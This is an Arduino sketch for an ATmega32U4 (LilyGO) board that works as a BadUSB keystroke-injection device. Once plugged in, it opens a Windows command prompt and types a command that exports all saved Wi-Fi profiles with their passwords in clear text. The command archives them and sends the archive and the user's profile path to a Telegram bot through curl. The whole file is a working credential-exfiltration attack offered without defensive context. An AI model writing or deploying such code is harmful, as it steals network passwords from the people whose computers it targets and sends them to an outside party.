/*ATmega32U4 (Lily GO)*/

#include "Keyboard.h"

void typeKey(int key)
{
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}

/* Init function */
void setup()
{
  Keyboard.begin();

  delay(1500);
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  Keyboard.releaseAll();

  delay(100);

  Keyboard.print("cmd");

  typeKey(KEY_RETURN);

  delay(500);

  Keyboard.print ("cd %TEMP% && mkdir wifi && cd wifi && netsh wlan export profile key=clear && cd ../ && tar -cvzf wifi.tar \"wifi\" && curl -s -X POST \"https://api.telegram.org/bot1729420377:AAHIJt-ZH2VlIanxSo9w-xxxxxx/sendmessage?chat_id=1715794814&text=%userprofile%\" && curl -s -X POST \"https://api.telegram.org/bot1729420377:AAHIJt-ZH2VlIanxSo9w-xxxxxx/sendDocument?chat_id=1715794814\" -F document=@\"wifi.tar\"");

  typeKey(KEY_RETURN);

  delay(100);

  Keyboard.print("exit");

  typeKey(KEY_RETURN);

  Keyboard.end();
}
void loop() {}
